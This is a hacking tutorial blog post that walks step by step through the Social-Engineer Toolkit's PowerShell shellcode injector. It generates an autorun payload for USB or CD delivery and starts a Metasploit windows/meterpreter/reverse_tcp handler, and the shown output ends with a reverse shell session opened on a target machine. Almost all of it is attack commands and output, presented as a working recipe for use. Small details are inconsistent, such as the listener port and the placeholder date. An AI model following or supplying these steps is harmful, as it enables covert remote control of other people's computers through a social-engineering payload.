PowerShell Attack Vectors

[LETS MAKE IT WORK]

#1) Open terminal & type:
assault@hackbook:~$ sudo setoolkit

*From the SET menu, Hit 1 by 1 – And don’t forget to read carefully the output after each keypress*
set > 1 = Social – Engineering Attacks
set > 9 = Powershell Attack Vectors
set:infectious>1 = powershell alphanumeric shellcode injector
*Set your local host IP & the port number*
set:payloads> IP address for the payload listener (LHOST) : 192.168.50.15
set:payloads> Enter the PORT for the reverse listener: 443
*Port 443 is hypertext transfer protocol over TLS\SSL means HTTPS*
[*] Generating the payload.. please be patient.
[*] Payload has been exported the the default SET home directory (/root/.set/) folder ‘autorun’
[*] Note a backup copy of template.pdf is also in /root/.set/template.pdf if needed.
[-] Copy the content of the folder to a CD/DVD/USB to autrun
set> Create a listener right now [yes:|no]: yes
*You will get this output*
[*] Launching Metasploit.. This could take a few. Be patient! Or else no shells for you…

 

Metasploit Park, System Security Interface
Version 4.0.5, Alpha E
Ready…
> access security
access: PERMISSION DENIED.
> access security grid
access: PERMISSION DENIED.
> access main security grid
access: PERMISSION DENIED…..and…
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!
YOU DON’T SAY THE MAGIC WORD!

Payload caught by AV? Fly under the radar with Dynamic Payloads in
Metasploitm Pro — learn more on http://rapid7.com/metasploit

+ — –=[metasploit v4.12.15-dev                                        ]
+ — –=[1563 exploits – 9.4 auxiliary – 269 post            ]
+ — –=[455 payload – 39 encoders – 8 nops                   ]
+ — –=[Free Metasploit Pro trial: http:/r-7.co/try.msp ]

[*] Processing /root/.set/reports/powershell/powershell.rc for ERB directives.
resource (/root/.set/reports/powershell/powershell.rc)> use multi/handler
resource (/root/.set/reports/powershell/powershell.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (/root/.set/reports/powershell/powershell.rc)> set LPORT 443
LPORT => 443
resource (/root/.set/reports/powershell/powershell.rc)> set LHOST 0.0.0.0
LHOST => 0.0.0.0
resource (/root/.set/reports/powershell/powershell.rc)> set ExitOnSession false
ExitOnSession => false
resource (/root/.set/reports/powershell/powershell.rc)> exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 0.0.0.0:443
[*] Staring the payload handler…
msf exploit (handler) >[*] Sending stage (957487 bytes) to 192.168.50.7
[*] Meterpreter session 1 opened (192.168.50.15:445 -> 192.168.50.7:1375) at 2015-00-00 00:00:00 +0200
*Now hit enter & tyep*
msf exploit (handler) > sessions
*In here you will get the active session*
msf exploit (handler) > session -i 1
[*] Starting interaction with 1…

meterpreter >

ENJOY! 🙂

 

 

Here is an example by Gamer Forever